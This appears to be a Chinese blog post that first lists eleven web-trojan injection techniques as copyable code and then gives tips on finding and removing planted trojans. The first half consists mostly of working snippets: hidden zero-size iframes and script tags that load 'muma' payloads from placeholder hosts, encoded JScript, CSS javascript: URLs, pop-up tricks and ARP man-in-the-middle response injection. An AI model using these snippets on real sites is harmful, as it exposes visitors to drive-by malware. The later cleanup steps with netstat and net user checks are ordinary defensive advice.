`
java-mans
  • 浏览: 11456984 次
文章分类
社区版块
存档分类
最新评论

网页常见木马代码

 
阅读更多

网页木马代码大全:

一:框架挂马

<iframe src=地址 width=0 height=0></iframe>

二:js文件挂马

首先将以下代码
document.write("<iframe width=’0’ height=’0’ src=’地址’></iframe>");
保存为xxx.js,
则JS挂马代码为
<script language=javascript src=xxx.js></script>

三:js变形加密

<SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt></script>
muma.txt可改成任意后缀
四:body挂马

<body onload="window.location=’地址’;"></body>

五:隐蔽挂马

top.document.body.innerHTML = top.document.body.innerHTML + ’\r\n<iframe src="http://www.xxx.com/muma.htm/"></iframe>’;

六:css中挂马

body {
background-image: url(’javascript:document.write("<script src=http://www.XXX.net/muma.js></script>")’)}

七:JAJA挂马

<SCRIPT language=javascript>
window.open ("地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1");
</script>

八:图片伪装

<html>
<iframe src="网马地址" height=0 width=0></iframe>
<img src="图片地址"></center>
</html>

九:伪装调用:

<frameset rows="444,0" cols="*">
<frame src="打开网页" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0">
<frame src="网马地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0">
</frameset>

十:高级欺骗

<a href="http://www.163.com(迷惑连接地址,显示这个地址指向木马地址)" onMouseOver="www_163_com(); return true;">
页面要显示的内容 </a>
<SCRIPT Language="JavaScript">
function www_163_com ()
{
var url="网马地址";
open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10");
}
</SCRIPT>

十一: 超级网马—通过arp欺骗来直接挂马

原理:arp中间人攻击,实际上相当于做了一次代理。

正常时候: A---->B ,A是访问的正常客户,B是要攻击的服务器,C是被我们控制的主机
arp中间人攻击时候: A---->C---->B
B---->C---->A
实际上,C在这里做了一次代理的作用

那么HTTP请求发过来的时候,C判断下是哪个客户端发过来的包,转发给B,然后B返回HTTP响应的时候,在HTTP响应包中,插入一段挂马的代码,比如<iframe>...之类,再将修改过的包返回的正常的客户A,就起到了一个挂马的作用.在这个过程中,B是没有任何感觉的,直接攻击的是正常的客户A,如果A是管理员或者是目标单位,就直接挂上马了。

如何处理网页木马:

1、找到嵌入的网页木马文件。以下,拿自己的经历说事。找到的文件是wm.htm

2、在注册表中查找wm.htm。很幸运,找到了。开始顺藤摸瓜...

3、修改键值wm.htm为wm_nnd.htm。

4、再次查找wm.htm。很不幸,又查到了。说明有服务程序在作怪。嘿嘿,有意外发现。
cain.exe,据说是密码嗅探器。

5、修改键值cain.exe为cain_nnd.exe。

6、查找cain.exe,仍然可以查到。嘻嘻,在预料之中。

7、怀疑wm.htm与cain.exe同流合污,背后有服务程序作后台。

8、快查查看,系统服务程序。在运行->msconfig 或直接在命令行使用net start,查看可疑程序

9、发现temp*.exe(全名记不清了),立马net stop server 。

10、快去修改键值wm.htm为wm_nnd.htm,cain.exe为cain_nnd.exe。

11、再次查找wm.htm或cain.exe,没有找到。哈哈,很好。

12、观察了几天,没再发生挂马的现象。

另外,通过检测网络连接查看服务器是否中了木马或病毒

1、使用netstat -an 查看所有和本地计算机建立连接的IP。

2、连接包含四个部分——proto(连接方式)、local address(本地连接地址)、foreign address(和本地建立连接的地址)、state(当前端口状态)。 通过这个命令的详细信息,可以完全监控计算机上的连接,从而达到控制计算机的目的。

3、手工制作bat程序,生成网络连接日志文件供站长分析:bat文件代码如下

REM 注释:监控的时间
time /t>>Netstat.log
REM 每隔30秒,把服务器上通过tcp协议通讯的IP和端口写入日志文件
Netstat -n -p tcp 30>>Netstat.log

注意:要谨慎使用,这会给服务器带来性能影响。最好,在服务器发生异常,怀疑中木马或病毒时,用来分析网络连接日志。

仅仅这些还不够,说说更严重的:

1、可恶的攻击者喜欢使用克隆账号的方法来控制你的计算机。“它们”激活一个系统中的默认账户,但这个账户是不经常用的, 然后使用工具把这个账户提升到管理员权限,从表面上看来这个账户还是和原来一样,但是这个克隆的账户却是系统中最大的安全隐患。

2、赶快检测系统帐户:
a、在命令行下输入net user,查看计算机上有些什么用户。
b、使用“net user 用户名”查看这个用户属于什么权限的及登录时间等。
c、一般除了Administrator是administrators组的,如果你发现一个系统内置的用户是属于administrators组的,
那么别人在你的计算机上克隆账户的概率为90%。
d、是使用“net user 用户名 /del” 来删掉这个用户,还是修改其它配置,这你说了算。


当然,仅靠这些
法还远远不够。在此,倡议站长为网马反击战献计献策,把预防,处理,反击网马的经验拿给大家分享。谢谢!

分享到:
评论

相关推荐

    常见网页木马识别防范20 招

    格式化硬盘现象描述:这类恶意代码的特征就是利用IE 执行ActiveX 的功能, 让你无意中格式化自己的...下载运行木马程序现象描述:在网页上浏览也会中木马?当然,由于IE5.0 本身的漏洞,使这样的新式入侵手法成为可能。

    js cookies 常见网页木马挂马代码 24小时只加载一次

    代码如下:&lt;div xss=removed&gt; [removed] function goad(){ var Then = new Date() Then.setTime(Then.getTime() + 2*60*60*1000) var cookieString = new String([removed]) var cookieHeader = “Cookier1=” var ...

    一个完整的网络木马解密实录

    前期我们都是通过代码的分析,将一些 常见的网马加密手法,对应得解密方法提供给大家。这些都是一些掌握解密的基础,只有通过基础的学习,才能更好的理解并掌握后期整个网马解密的分析,希望大 家在看本期讲解教程前...

    vc代码合集

    2012-06-11 09:59 232 79套经典网页设计模版.zip 2012-06-11 10:18 373,373 ADO数据组件精解示例.rar 2012-06-11 10:31 2,314,224 ArcGIS Engine开发从入门到精通源码.rar 2012-06-11 10:32 2,177,024 AS3游戏引擎...

    《新手学黑客攻防》┊神龙工作室[.PDF]

    5.1.3 常见的木马入侵和伪装手段 114 1. 常见的木马入侵手段 114 2. 揭露木马的伪装手段 115 5.1.4 木马诊断 117 1. 计算机中木马的表现 117 2. 计算机中木马的途径 118 3. 木马的防范策略 119 5.1.5 木马制作与防范...

    PC慢慢(PCslow Doctor) v3.0 build 0613

    并且查杀各种木马和恶意代码程序,检测系统信息,检查系统漏洞,屏蔽各种网络插件。网络最大限度加速,桌面或系统文件优化,删除垃圾文件和垃圾信息,系统优化瞬间完成。网页地址被篡改,电脑速度变慢,IE修复,一键...

    Javascript 网页水印(非图片水印)实现代码

    本文中,流牛木马就与大家一起交流一下有关制作网页水印的心得。 本文讨论以下的情形: 新增水印的方法需要用Javascript完成,并要求能够方便地加入到原有的页面中,不能影响到已有的功能。 1.2 预期目标 就图片...

    网站啄木鸟(网站整体威胁检测系统)V5.9+破解补丁

    经过数百个用户的实践证明,“网站啄木鸟”是Web安全性价比最高的产品,相比国外的Web安全扫描产品来说,速度快,具备紧密跟踪国内最新网页木马的快速响应及更新能力;相比国内的Web安全扫描产品来说,功能多,结果...

    计算机网络安全相关资料分享.zip

    一种基于分层聚类方法的木马通信行为检测模型 移动恶意代码的关联与追踪 移动手机应用软件安全测试 重要行业信息系统安全风险 自主可控云计算平台关键技术 做好新型信息技术发展应用的信息安全等级保护工作 QQ盗号...

    网站被黑后处理方法及删除批量恶意代码的方法步骤

    暂时关闭网站 网站被黑客入侵后,最常见的情况就是被植入木马程序,为了保证浏览者的安全,必须先关闭网站,待处理完毕后再开放。关闭时可以暂时将域名转向其它地址,如建立一个网站的帖吧,或者放置一个说明页面。...

    ietools2.6.exe

    *在注册表中删除常见木马程序的键值. *检查启动项不被常见病毒感染(包括ini等配置文件)。 *删除网页历史记录,中文网址需要重新系统。 *清除mediaplayer和realone的历史记录。 *优化大师与98冲突的修复 *自动...

    网络安全威胁与对策.docx

    网络安全威胁与对策全文共4页,当前为第1页。网络安全威胁与对策全文共4页,...如果网站在制作编写网页代码时,未加入数据输入合法性判断流程,则攻击者就可以利用专门工具,甚至直接在浏览器地址栏等区域,向网站后

    《计算机应用技术基础》第四章.pptx

    计算机病毒 概念:指编制者在计算机程序中插入的破坏计算机功能或者数据,影响计算机使用并且能够自我复制的一组计算机指令或者程序代码。 特点:寄生性、传染性、潜伏性、隐蔽性、破坏性。 产生过程:程序设计 ...

    教师计算机网络安全培训.pptx

    有害程序攻击 木马程序攻击:盗版软件、钓鱼网站、网页插件都是很好的木马程序存放载体,如果用户安装了未经验证的盗版软件或浏览了不安全的网页就很容给电脑植入病毒 宏病毒散播:宏病毒主要源头来自office文件,...

    网络安全知识总结.docx

    终端服务配置 用户和组策略 防止rpc漏洞 本人动手DIY在本地策略的平安选项 工具引见 避开被恶意代码 木马等病毒攻击 1.查看本地共享资源 运转CMD输入net share,假如看到有特别的共享,那么应当关闭。 但是有时你...

    WDLF Eipes 文达岭峰电商行业内部测款系统 v1.0.zip

    常见运用、部署于电子商务企业的内部局域网中,作为服装新品的选款、新设计方案内部意见征集等多种丰富应用场景。 建立和运用WDLF Eipes 系统,旨在充分调动企业内部的力量,通过高效而廉价的互联网手段,让公司以...

    网络安全论文最终版.docx

    木马、僵尸等恶意代码发展迅速,针对DNS服务器和域名转发服务器的攻击数量有明显增多的趋势。新型网络的应用发展带来了新的安全问题和威胁。 网络安全论文最终版全文共3页,当前为第2页。 网络安全论文最终版全文共3...

    windows域服务器部署方案.doc

    部分网站网页含有恶意代码,强行在用户电脑上安装各种网络搜索引擎插件、广告插件 或中文域名插件等,增加了办公电脑大量的资源消耗,导致计算机反应缓慢; 4. 个别员工私自安装从网络下载安装的软件,这些从网络上...

    校园网络安全建设与管理.docx

    11网络病毒的侵袭对网络造成严重威胁的是网络病毒,如常见的木马病毒等。 病毒的特点是传播速度很快,会在短时间内对网终造成破坏,甚至使整个网络处于瘫痪状态,再加之防御措施不得力,如校园杀毒软件得不到及时...

    计算机网络安全讲座稿(标准版).docx

    1、上网浏览问题 我们在上网时经常会接触到动态网页(指的是网页中有可执行代码),虽然会给我们带来很多不错的视觉效果,但同时也可能会有一些恶意代码,给我们的计算机带来安全隐患。举例:我们在上网时IE标题栏或...

Global site tag (gtag.js) - Google Analytics